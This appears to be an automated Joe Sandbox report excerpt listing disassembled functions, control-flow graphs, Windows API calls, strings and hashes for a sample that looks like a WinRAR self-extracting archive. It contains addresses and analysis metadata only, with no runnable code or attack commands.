                                                                                • String ID: .lnk$.tmp$<br>$@set:user$HIDE$MAX$MIN$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$lnk
                                                                                • API String ID: 2285161090-3916287355
                                                                                • Opcode ID: fd2ad00ce84fbf863eb190845ef4c9fcac58144421a2a3ec869aeac6c2c057d6
                                                                                • Instruction ID: 60a1e457e14ddaa2821364ad4f4c89bffaafff329958c412912147cbb828a03e
                                                                                • Opcode Fuzzy Hash: fd2ad00ce84fbf863eb190845ef4c9fcac58144421a2a3ec869aeac6c2c057d6
                                                                                • Instruction Fuzzy Hash: C3139F6AA04BC2C5EB10DF64D8482EC27A1FB44B9CF580535DA6DA7A9ADF3CDD94C340
                                                                                Function 00007FF655950754 Relevance: 45.9, APIs: 21, Strings: 5, Instructions: 380filetimewindowCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1462 7ff655950754-7ff655950829 call 7ff65593dfd0 call 7ff6559362dc call 7ff65594946c call 7ff655953cf0 call 7ff655949a14 1473 7ff65595082b-7ff655950840 1462->1473 1474 7ff655950860-7ff655950883 1462->1474 1477 7ff65595085b call 7ff65595220c 1473->1477 1478 7ff655950842-7ff655950855 1473->1478 1475 7ff6559508ba-7ff6559508dd 1474->1475 1476 7ff655950885-7ff65595089a 1474->1476 1481 7ff655950914-7ff655950937 1475->1481 1482 7ff6559508df-7ff6559508f4 1475->1482 1479 7ff65595089c-7ff6559508af 1476->1479 1480 7ff6559508b5 call 7ff65595220c 1476->1480 1477->1474 1478->1477 1483 7ff655950ddd-7ff655950de2 call 7ff655957904 1478->1483 1479->1480 1479->1483 1480->1475 1488 7ff655950939-7ff65595094e 1481->1488 1489 7ff65595096e-7ff65595097a GetCommandLineW 1481->1489 1486 7ff6559508f6-7ff655950909 1482->1486 1487 7ff65595090f call 7ff65595220c 1482->1487 1500 7ff655950de3-7ff655950df0 call 7ff655957904 1483->1500 1486->1483 1486->1487 1487->1481 1492 7ff655950969 call 7ff65595220c 1488->1492 1493 7ff655950950-7ff655950963 1488->1493 1495 7ff655950b47-7ff655950b5e call 7ff655936454 1489->1495 1496 7ff655950980-7ff6559509b7 call 7ff65595797c call 7ff65592129c call 7ff65594cad0 1489->1496 1492->1489 1493->1483 1493->1492 1506 7ff655950b89-7ff655950ce4 call 7ff655921fa0 SetEnvironmentVariableW GetLocalTime call 7ff655933e28 SetEnvironmentVariableW GetModuleHandleW LoadIconW call 7ff65594b014 call 7ff6559398ac call 7ff6559467b4 * 2 DialogBoxParamW call 7ff6559468a8 * 2 1495->1506 1507 7ff655950b60-7ff655950b85 call 7ff655921fa0 call 7ff655953640 1495->1507 1521 7ff6559509ec-7ff6559509f3 1496->1521 1522 7ff6559509b9-7ff6559509cc 1496->1522 1508 7ff655950df5-7ff655950e2f call 7ff655951900 1500->1508 1569 7ff655950cec-7ff655950cf3 1506->1569 1570 7ff655950ce6 SleepEx 1506->1570 1507->1506 1518 7ff655950e34-7ff655950ee1 1508->1518 1518->1508 1528 7ff655950adb-7ff655950b12 call 7ff65595797c call 7ff65592129c call 7ff65594fd0c 1521->1528 1529 7ff6559509f9-7ff655950a13 OpenFileMappingW 1521->1529 1526 7ff6559509e7 call 7ff65595220c 1522->1526 1527 7ff6559509ce-7ff6559509e1 1522->1527 1526->1521 1527->1500 1527->1526 1528->1495 1551 7ff655950b14-7ff655950b27 1528->1551 1533 7ff655950a19-7ff655950a39 MapViewOfFile 1529->1533 1534 7ff655950ad0-7ff655950ad9 CloseHandle 1529->1534 1533->1534 1538 7ff655950a3f-7ff655950a6f UnmapViewOfFile MapViewOfFile 1533->1538 1534->1495 1538->1534 1541 7ff655950a71-7ff655950aca call 7ff65594a190 call 7ff65594fd0c call 7ff65593b9b4 call 7ff65593bb00 call 7ff65593bb70 UnmapViewOfFile 1538->1541 1541->1534 1554 7ff655950b29-7ff655950b3c 1551->1554 1555 7ff655950b42 call 7ff65595220c 1551->1555 1554->1555 1558 7ff655950dd7-7ff655950ddc call 7ff655957904 1554->1558 1555->1495 1558->1483 1571 7ff655950cfa-7ff655950d1d call 7ff65593b8e0 DeleteObject 1569->1571 1572 7ff655950cf5 call 7ff655949f4c 1569->1572 1570->1569 1577 7ff655950d25-7ff655950d2c 1571->1577 1578 7ff655950d1f DeleteObject 1571->1578 1572->1571 1579 7ff655950d48-7ff655950d59 1577->1579 1580 7ff655950d2e-7ff655950d35 1577->1580 1578->1577 1582 7ff655950d5b-7ff655950d67 call 7ff65594fe24 CloseHandle 1579->1582 1583 7ff655950d6d-7ff655950d7a 1579->1583 1580->1579 1581 7ff655950d37-7ff655950d43 call 7ff65592ba0c 1580->1581 1581->1579 1582->1583 1586 7ff655950d7c-7ff655950d89 1583->1586 1587 7ff655950d9f-7ff655950da4 call 7ff6559494e4 1583->1587 1588 7ff655950d8b-7ff655950d93 1586->1588 1589 7ff655950d99-7ff655950d9b 1586->1589 1594 7ff655950da9-7ff655950dd6 call 7ff655952320 1587->1594 1588->1587 1592 7ff655950d95-7ff655950d97 1588->1592 1589->1587 1593 7ff655950d9d 1589->1593 1592->1587 1593->1587
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: File$EnvironmentHandleVariableView$_invalid_parameter_noinfo_noreturn$AddressCloseCurrentDeleteDirectoryModuleObjectProcUnmap$CommandDialogIconInitializeLineLoadLocalMallocMappingOpenParamSleepTimeswprintf
                                                                                • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                • API String ID: 1048086575-3710569615
                                                                                • Opcode ID: e7d3594d41fc1c42d2a273e76cc46138f8b85040c46b05d7c1c5927625479fcd
                                                                                • Instruction ID: 32f9894556785607b4ca41940ee6514ce17becb6b5ed9fa00daae8890a57957d
                                                                                • Opcode Fuzzy Hash: e7d3594d41fc1c42d2a273e76cc46138f8b85040c46b05d7c1c5927625479fcd
                                                                                • Instruction Fuzzy Hash: C0129A79A187C281EB10DB24E84D2B96361FF85F8CF584231DA9DA6A97DF3CE954C340
                                                                                Function 00007FF65593A4AC Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 250COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Rect$ItemText$ByteCharClientLongMetricsMultiSystemWideswprintf
                                                                                • String ID: $%s:$CAPTION
                                                                                • API String ID: 1936833115-404845831
                                                                                • Opcode ID: 1224945cd41bf140f0dcf37f1b002595631e4f701a4b658f84a72e9da714e3d9
                                                                                • Instruction ID: d2a10ad701181eb29662c9313f5a1032a53c51ee4d99528248f551c4d5ec24a5
                                                                                • Opcode Fuzzy Hash: 1224945cd41bf140f0dcf37f1b002595631e4f701a4b658f84a72e9da714e3d9
                                                                                • Instruction Fuzzy Hash: 5D911B36B1868287E714CF29E81866967A1FBC5B88F485435EE4DA7B59CF3CEC05CB00
                                                                                Function 00007FF655948624 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 101memorywindowCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
                                                                                • String ID: PNG
                                                                                • API String ID: 541704414-364855578
                                                                                • Opcode ID: c8606208415c3a11eb94d5df8c8f8595ea54109f2541637b646828bce78d4013
                                                                                • Instruction ID: 52c47363969ee6b0a5425ba8aef9ba8344f4b826949306efd90da5ce8cae4cc2
                                                                                • Opcode Fuzzy Hash: c8606208415c3a11eb94d5df8c8f8595ea54109f2541637b646828bce78d4013
                                                                                • Instruction Fuzzy Hash: 30413039A09B8281EE048B56D4583B963A0BF88FD8F0C4435CE5DA7766EF7CEC498341
                                                                                Function 00007FF65592F930 Relevance: 17.2, APIs: 8, Strings: 1, Instructions: 1417COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                • String ID: __tmp_reference_source_
                                                                                • API String ID: 3668304517-685763994
                                                                                • Opcode ID: 5284b8deacc18d9dd878dcda6fbd0c25d4ad9dd8b7c2e50a2c8a7b8efee843d9
                                                                                • Instruction ID: 13bf3f94dfb688c20e03efbcad25261bc33c995807eda6c8334f850cd45c04bd
                                                                                • Opcode Fuzzy Hash: 5284b8deacc18d9dd878dcda6fbd0c25d4ad9dd8b7c2e50a2c8a7b8efee843d9
                                                                                • Instruction Fuzzy Hash: 4AE2BA6AA086C192EE64CB65D5483FE67A1FB41B48F484131DB9DA36A7CF3CF855C700
                                                                                Function 00007FF655924840 Relevance: 12.1, APIs: 5, Strings: 1, Instructions: 1624COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                • String ID: CMT
                                                                                • API String ID: 3668304517-2756464174
                                                                                • Opcode ID: 9b9b17b47160488b51796ce07d531ea6025730b83c8e66bf90b899a3d3ffa88f
                                                                                • Instruction ID: 49dc89c840c3874b0dd085d916bfb5a2d6287b373be2741cadeced0dea503da8
                                                                                • Opcode Fuzzy Hash: 9b9b17b47160488b51796ce07d531ea6025730b83c8e66bf90b899a3d3ffa88f
                                                                                • Instruction Fuzzy Hash: DDE2016AB096C286EB18DB71D9582FD67A1FB44B88F480035CA5EA7793DF3CE854C300
                                                                                Function 00007FF6559340BC Relevance: 10.7, APIs: 7, Instructions: 153fileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 3471 7ff6559340bc-7ff6559340f3 3472 7ff6559340f9-7ff655934101 3471->3472 3473 7ff6559341d2-7ff6559341df FindNextFileW 3471->3473 3474 7ff655934106-7ff655934118 FindFirstFileW 3472->3474 3475 7ff655934103 3472->3475 3476 7ff6559341e1-7ff6559341f1 GetLastError 3473->3476 3477 7ff6559341f3-7ff6559341f6 3473->3477 3474->3477 3478 7ff65593411e-7ff655934146 call 7ff655936a0c 3474->3478 3475->3474 3479 7ff6559341ca-7ff6559341cd 3476->3479 3480 7ff6559341f8-7ff655934200 3477->3480 3481 7ff655934211-7ff655934253 call 7ff65595797c call 7ff65592129c call 7ff655938090 3477->3481 3491 7ff655934148-7ff655934164 FindFirstFileW 3478->3491 3492 7ff655934167-7ff655934170 3478->3492 3482 7ff6559342eb-7ff65593430e call 7ff655952320 3479->3482 3484 7ff655934205-7ff65593420c call 7ff6559220b0 3480->3484 3485 7ff655934202 3480->3485 3507 7ff65593428c-7ff6559342e6 call 7ff65593f168 * 3 3481->3507 3508 7ff655934255-7ff65593426c 3481->3508 3484->3481 3485->3484 3491->3492 3495 7ff6559341a9-7ff6559341ad 3492->3495 3496 7ff655934172-7ff655934189 3492->3496 3495->3477 3500 7ff6559341af-7ff6559341be GetLastError 3495->3500 3498 7ff65593418b-7ff65593419e 3496->3498 3499 7ff6559341a4 call 7ff65595220c 3496->3499 3498->3499 3505 7ff655934315-7ff65593431b call 7ff655957904 3498->3505 3499->3495 3502 7ff6559341c8 3500->3502 3503 7ff6559341c0-7ff6559341c6 3500->3503 3502->3479 3503->3479 3503->3502 3507->3482 3510 7ff655934287 call 7ff65595220c 3508->3510 3511 7ff65593426e-7ff655934281 3508->3511 3510->3507 3511->3510 3514 7ff65593430f-7ff655934314 call 7ff655957904 3511->3514 3514->3505
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: FileFind$ErrorFirstLast_invalid_parameter_noinfo_noreturn$Next
                                                                                • String ID:
                                                                                • API String ID: 474548282-0
                                                                                • Opcode ID: e946e08dc8eba9ecab1b1533132c2bb6995f9a4699fd30eb303f74d9a567b386
                                                                                • Instruction ID: 86087b75b8ceea3cbc8c82d97b9d4cdb2998936d6e53b59df19e364e2aacd2fc
                                                                                • Opcode Fuzzy Hash: e946e08dc8eba9ecab1b1533132c2bb6995f9a4699fd30eb303f74d9a567b386
                                                                                • Instruction Fuzzy Hash: 4F61D866A08AC281DA108B54E94C2BD6361FF95FA8F155331EAADA36DADF3CD944C700
                                                                                Function 00007FF655925E24 Relevance: 7.6, APIs: 3, Strings: 1, Instructions: 586COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 3582 7ff655925e24-7ff655926129 call 7ff65593833c call 7ff6559385f0 3588 7ff65592612e-7ff655926132 3582->3588 3589 7ff655926141-7ff655926171 call 7ff6559383d8 call 7ff655938570 call 7ff655938528 3588->3589 3590 7ff655926134-7ff65592613c call 7ff655926fcc 3588->3590 3606 7ff655926177-7ff655926179 3589->3606 3607 7ff655926973-7ff655926976 call 7ff65592466c 3589->3607 3595 7ff65592697b 3590->3595 3597 7ff65592697e-7ff655926985 3595->3597 3599 7ff655926987-7ff655926998 3597->3599 3600 7ff6559269b4-7ff6559269e3 call 7ff655952320 3597->3600 3604 7ff65592699a-7ff6559269ad 3599->3604 3605 7ff6559269af call 7ff65595220c 3599->3605 3604->3605 3609 7ff6559269e4-7ff6559269e9 call 7ff655957904 3604->3609 3605->3600 3606->3607 3611 7ff65592617f-7ff655926189 3606->3611 3607->3595 3617 7ff6559269ea-7ff6559269ef call 7ff655957904 3609->3617 3611->3607 3614 7ff65592618f-7ff655926192 3611->3614 3614->3607 3616 7ff655926198-7ff6559261aa call 7ff6559385f0 3614->3616 3616->3590 3622 7ff6559261ac-7ff6559261fd call 7ff6559384f8 call 7ff655938528 * 2 3616->3622 3623 7ff6559269f0-7ff6559269f7 call 7ff655957904 3617->3623 3632 7ff65592623f-7ff655926249 3622->3632 3633 7ff6559261ff-7ff655926222 call 7ff65592466c call 7ff65592ba0c 3622->3633 3634 7ff655926266-7ff655926270 3632->3634 3635 7ff65592624b-7ff655926260 call 7ff655938528 3632->3635 3633->3632 3650 7ff655926224-7ff65592622e call 7ff65592433c 3633->3650 3639 7ff65592627e-7ff655926296 call 7ff65592334c 3634->3639 3640 7ff655926272-7ff65592627b call 7ff655938528 3634->3640 3635->3607 3635->3634 3648 7ff655926298-7ff65592629b 3639->3648 3649 7ff6559262b3 3639->3649 3640->3639 3648->3649 3651 7ff65592629d-7ff6559262b1 3648->3651 3652 7ff6559262b6-7ff6559262c8 3649->3652 3650->3632 3651->3649 3651->3652 3654 7ff6559268b7-7ff655926929 call 7ff655934d04 call 7ff655938528 3652->3654 3655 7ff6559262ce-7ff6559262d1 3652->3655 3674 7ff655926936 3654->3674 3675 7ff65592692b-7ff655926934 call 7ff655938528 3654->3675 3656 7ff6559262d7-7ff6559262da 3655->3656 3657 7ff655926481-7ff6559264f4 call 7ff655934c74 call 7ff655938528 * 2 3655->3657 3656->3657 3659 7ff6559262e0-7ff6559262e3 3656->3659 3690 7ff655926507-7ff655926533 call 7ff655938528 3657->3690 3691 7ff6559264f6-7ff655926500 3657->3691 3662 7ff65592632e-7ff655926353 call 7ff655938528 3659->3662 3663 7ff6559262e5-7ff6559262e8 3659->3663 3679 7ff65592639e-7ff6559263c5 call 7ff655938528 call 7ff655938384 3662->3679 3680 7ff655926355-7ff65592638f call 7ff655924228 call 7ff655923c84 call 7ff65592701c call 7ff655921fa0 3662->3680 3666 7ff65592696d-7ff655926971 3663->3666 3667 7ff6559262ee-7ff655926329 call 7ff655938528 3663->3667 3666->3597 3667->3666 3676 7ff655926939-7ff655926946 3674->3676 3675->3676 3682 7ff655926948-7ff65592694a 3676->3682 3683 7ff65592694c 3676->3683 3701 7ff6559263c7-7ff655926400 call 7ff655924228 call 7ff655923c84 call 7ff65592701c call 7ff655921fa0 3679->3701 3702 7ff655926402-7ff65592641f call 7ff655938444 3679->3702 3726 7ff655926390-7ff655926399 call 7ff655921fa0 3680->3726 3682->3683 3689 7ff65592694f-7ff655926959 3682->3689 3683->3689 3689->3666 3694 7ff65592695b-7ff655926968 call 7ff655924840 3689->3694 3703 7ff655926549-7ff655926557 3690->3703 3704 7ff655926535-7ff655926544 call 7ff6559383d8 call 7ff65593f134 3690->3704 3691->3690 3694->3666 3701->3726 3723 7ff655926421-7ff65592646f call 7ff655938444 * 2 call 7ff65593c800 call 7ff655954a70 3702->3723 3724 7ff655926475-7ff65592647c 3702->3724 3709 7ff655926559-7ff65592656c call 7ff6559383d8 3703->3709 3710 7ff655926572-7ff655926595 call 7ff655938528 3703->3710 3704->3703 3709->3710 3727 7ff655926597-7ff65592659e 3710->3727 3728 7ff6559265a0-7ff6559265b0 3710->3728 3723->3724 3724->3666 3726->3679 3732 7ff6559265b3-7ff6559265eb call 7ff655938528 * 2 3727->3732 3728->3732 3746 7ff6559265f6-7ff6559265fa 3732->3746 3747 7ff6559265ed-7ff6559265f4 3732->3747 3749 7ff655926603-7ff655926632 3746->3749 3751 7ff6559265fc 3746->3751 3747->3749 3752 7ff65592663f 3749->3752 3753 7ff655926634-7ff655926638 3749->3753 3751->3749 3755 7ff655926641-7ff655926656 3752->3755 3753->3752 3754 7ff65592663a-7ff65592663d 3753->3754 3754->3755 3756 7ff655926658-7ff65592665b 3755->3756 3757 7ff6559266ca 3755->3757 3756->3757 3759 7ff65592665d-7ff655926683 3756->3759 3758 7ff6559266d2-7ff655926731 call 7ff655923d00 call 7ff655938444 call 7ff655940d54 3757->3758 3770 7ff655926733-7ff655926740 call 7ff655924840 3758->3770 3771 7ff655926745-7ff655926749 3758->3771 3759->3758 3761 7ff655926685-7ff6559266a9 3759->3761 3763 7ff6559266ab 3761->3763 3764 7ff6559266b2-7ff6559266bf 3761->3764 3763->3764 3764->3758 3765 7ff6559266c1-7ff6559266c8 3764->3765 3765->3758 3770->3771 3773 7ff65592675b-7ff655926772 call 7ff65595797c 3771->3773 3774 7ff65592674b-7ff655926756 call 7ff65592473c 3771->3774 3779 7ff655926777-7ff65592677e 3773->3779 3780 7ff655926774 3773->3780 3781 7ff655926859-7ff655926860 3774->3781 3782 7ff655926780-7ff655926783 3779->3782 3783 7ff6559267a3-7ff6559267ba call 7ff65595797c 3779->3783 3780->3779 3784 7ff655926873-7ff65592687b 3781->3784 3785 7ff655926862-7ff655926872 call 7ff65592433c 3781->3785 3788 7ff65592679c 3782->3788 3789 7ff655926785 3782->3789 3798 7ff6559267bc 3783->3798 3799 7ff6559267bf-7ff6559267c6 3783->3799 3784->3666 3787 7ff655926881-7ff655926892 3784->3787 3785->3784 3792 7ff6559268ad-7ff6559268b2 call 7ff65595220c 3787->3792 3793 7ff655926894-7ff6559268a7 3787->3793 3788->3783 3794 7ff655926788-7ff655926791 3789->3794 3792->3666 3793->3623 3793->3792 3794->3783 3797 7ff655926793-7ff65592679a 3794->3797 3797->3788 3797->3794 3798->3799 3799->3781 3801 7ff6559267cc-7ff6559267cf 3799->3801 3802 7ff6559267e8-7ff6559267f0 3801->3802 3803 7ff6559267d1 3801->3803 3802->3781 3805 7ff6559267f2-7ff655926826 call 7ff655938360 call 7ff655938598 call 7ff655938528 3802->3805 3804 7ff6559267d4-7ff6559267dd 3803->3804 3804->3781 3806 7ff6559267df-7ff6559267e6 3804->3806 3805->3781 3813 7ff655926828-7ff655926839 3805->3813 3806->3802 3806->3804 3814 7ff65592683b-7ff65592684e 3813->3814 3815 7ff655926854 call 7ff65595220c 3813->3815 3814->3617 3814->3815 3815->3781
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: CMT
                                                                                • API String ID: 0-2756464174
                                                                                • Opcode ID: 81cbc51edb26831c97f40985bc080a49e7e7386e8398e3b88c9e13d1af394772
                                                                                • Instruction ID: 72c47fe8a54f339aa1bf9c851ef749d96c05d5f238643c7c4a69e448d03176be
                                                                                • Opcode Fuzzy Hash: 81cbc51edb26831c97f40985bc080a49e7e7386e8398e3b88c9e13d1af394772
                                                                                • Instruction Fuzzy Hash: 6D42E16AB096C196EB18DB74C5582FD67A0EB41B4CF480136DB5EA7A97DF3CE918C300
                                                                                Function 00007FF655934928 Relevance: .1, Instructions: 136COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                • String ID:
                                                                                • API String ID: 3340455307-0
                                                                                • Opcode ID: 388497648aa7178462f46e8a8cb48851b3eb3f46bbabbbefb59410a44eea80d8
                                                                                • Instruction ID: 7a02800528c309ec4161c55d41e72ea579d1eabda0e704e330669e8ace8e5d5e
                                                                                • Opcode Fuzzy Hash: 388497648aa7178462f46e8a8cb48851b3eb3f46bbabbbefb59410a44eea80d8
                                                                                • Instruction Fuzzy Hash: 6041F866B156D686FA64DF11A90C76E2252FBC4F8CF0A4034DE0DA7796DF3CE8428704
                                                                                Function 00007FF65593DFD0 Relevance: 143.9, APIs: 16, Strings: 66, Instructions: 440libraryfileloaderCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
